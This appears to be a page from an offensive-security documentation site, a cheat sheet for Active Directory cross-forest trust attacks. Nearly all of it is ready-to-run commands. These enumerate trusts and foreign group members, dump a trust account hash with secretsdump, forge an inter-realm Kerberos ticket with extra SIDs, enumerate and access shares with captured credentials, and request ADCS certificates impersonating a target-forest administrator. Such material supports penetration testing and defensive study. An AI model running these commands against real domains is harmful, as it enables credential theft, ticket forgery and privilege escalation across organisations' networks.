> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Forest Trust Attacks

> Cross-forest attacks: SID filtering bypass, foreign group membership, and trust abuse between forests.

## Enumerate Forest Trusts

```powershell theme={"dark"}
Get-ADTrust -Filter * | ? {$_.ForestTransitive -eq $true}
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
Get-DomainTrust -Domain target-forest.local
```

***

## Cross-Forest Enumeration

### Users in Foreign Domain

```powershell theme={"dark"}
Get-DomainUser -Domain target-forest.local
```

### Foreign Group Membership

```powershell theme={"dark"}
Get-DomainForeignGroupMember -Domain target-forest.local
Get-DomainForeignUser -Domain target-forest.local
```

### BloodHound

Collect data from both forests. Analyze cross-forest edges.

```bash theme={"dark"}
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
bloodhound-python -u user -p pass -d target-forest.local -ns TARGET_DC_IP -c all
```

***

## SID Filtering Bypass (Limited)

Across a forest trust, SID filtering strips **every** SID with a RID below 1000 (500, 512, 513, 518, 519, 520, …), regardless of SID history.

### What Still Works

SIDs **not** filtered across forests:

* Custom group/user SIDs with RID **≥ 1000** from the trusted forest
* Note: Domain Users (RID 513) is below 1000 and **is** filtered, despite being a default group

### Check Filtering Status

```cmd theme={"dark"}
nltest /sc_query:target-forest.local
netdom trust target-forest.local /domain:domain.local /quarantine
```

***

## Trust Account Attack

### Get Foreign Trust Account

```bash theme={"dark"}
impacket-secretsdump DOMAIN/admin:pass@DC_IP -just-dc-user 'TARGET-FOREST$'
```

### Forge Trust Ticket

```bash theme={"dark"}
impacket-ticketer -nthash TRUST_HASH -domain-sid MY_SID -domain domain.local -spn krbtgt/TARGET-FOREST.LOCAL -extra-sid S-1-5-21-TARGET-1107 administrator   # RID >= 1000 (RID < 1000 like 513 is filtered)
```

Limited to non-filtered SIDs.

***

## Shared Resources Abuse

If foreign forest resources are accessible:

```bash theme={"dark"}
# Enumerate accessible shares
crackmapexec smb TARGET_FOREST_HOSTS -u 'DOMAIN\user' -p password --shares

# Access
smbclient //TARGET/share -U 'DOMAIN\user%password'
```

***

## ADCS Cross-Forest

If ADCS in target forest trusts your domain:

```bash theme={"dark"}
certipy find -u user@domain.local -p pass -dc-ip TARGET_DC -vulnerable
certipy req -u user@domain.local -p pass -ca TARGET_CA -template VulnTemplate -upn admin@target-forest.local
```

***

## PAM Trust (Bastion Forest)

Privileged Access Management trust allows shadow principals in bastion forest to map to principals in production forest.

```powershell theme={"dark"}
# Find a PAM/bastion trust with SID filtering disabled (abusable)
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
```

***

## Quick Reference

| Task             | Command                                           |
| ---------------- | ------------------------------------------------- |
| Enum trusts      | `Get-ADTrust -Filter *`                           |
| Foreign members  | `Get-DomainForeignGroupMember`                    |
| Trust account    | `secretsdump -just-dc-user 'FOREST$'`             |
| SID filtering    | Blocks privileged SIDs across forests             |
| Shared resources | `crackmapexec smb HOSTS -u user -p pass --shares` |
